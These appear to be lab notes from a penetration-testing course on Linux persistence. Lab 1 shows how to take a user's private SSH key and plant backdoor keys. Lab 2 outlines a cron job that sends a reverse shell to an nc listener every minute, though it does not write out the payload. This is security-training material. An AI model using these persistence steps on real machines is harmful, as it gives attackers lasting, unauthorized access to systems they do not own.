🔬Linux Persistence

Lab 1 - SSH

🔬 Maintaining access I

• Target IP: 192.3.140.3

• Persistence via SSH Keys, even after user credentials are modified

• Initial credentials: student :password

ip -br -c a
	192.3.140.2/24

ssh [email protected]

SSH Keys

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 13:40 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student    7 Apr 29 13:40 .bash_history
    drwx------ 2 student student 4096 Apr 29 13:39 .cache
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 .ssh
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.

cd .ssh
ls
	authorized_keys  id_rsa

• Show the private key inside id_rsa

• Check the authorized_keys file too

Persistence

• Exit the SSH session and download the id_rsa file

• Log back into the target system and trigger the password and connection reset

• Connect to the target using the downloaded private key

📌 Instead of using a user's private key, typically the attacker generates an SSH key pair on his system, keeps the private key on his system, transfers the public key onto the target system user's home .ssh directory and adds it in the authorized_keys file.

• SSH Penetration Testing

Lab 2 - Cron Jobs

🔬 T1168: Local Job Scheduling

• Target IP: 192.175.36.3

• Persistence via Cron Jobs

• Initial credentials: student :password

• 🔬 Check the Cron Jobs Linux attacks Lab here

• Scheduled Task/Job - MITRE ATT&CK

• crontab.guru

Cron Jobs

Persistence

• Create a new Cron job as the student user

  • The command inside the cron job will be executed with the student's permissions'

• Log back into the target system and trigger the password and connection reset

• Setup a nc listener and wait for the bash reverse shell from the cron job that runs every minute